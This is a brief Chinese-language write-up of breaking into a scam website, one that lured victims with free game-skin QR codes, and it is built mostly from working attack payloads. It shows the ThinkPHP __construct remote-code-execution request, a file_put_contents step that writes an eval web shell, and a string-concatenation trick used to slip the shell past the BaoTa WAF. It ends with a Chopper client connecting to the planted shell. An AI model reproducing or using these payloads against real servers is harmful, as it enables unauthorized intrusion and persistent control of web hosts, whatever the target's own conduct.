网站是这样的,他是利用短视频发布免费皮肤领取的视频,扫码进入这个网页,然后扫码进群再进行诈骗。
报错判断为think PHP框架
试试RCE
POST:
http://xxxx.xxxx.com/?s=index/index/
s=-1&_method=__construct&method=get&filter[]=phpinfo
为php5,尝试写shell
POST
http://xxx.xxx.com/?s=index/index
s=file_put_contents('1.php','<?php eval($_POST[x])?>')&_method=__construct&method=POST&filter[]=assert
宝塔waf
经过多次实验,宝塔应该是拦截了_POST[关键字,下面我们尝试绕过
在php里面我们可以使用'.'拼接符来连接前后的语句
<?php ev'.'al($_PO'.'ST[x])?>相当于<?php eval($_POST[x])?>
POST:
http://xxx.xxx.com/?s=index/index
s=file_put_contents('1.php','<?php ev'.'al($_PO'.'ST[x])?>')&_method=__construct&method=POST&filter[]=assert
写shell成功
访问http://xxx.xx/1.php
菜刀连接成功
宝塔限制的太死了,提权不了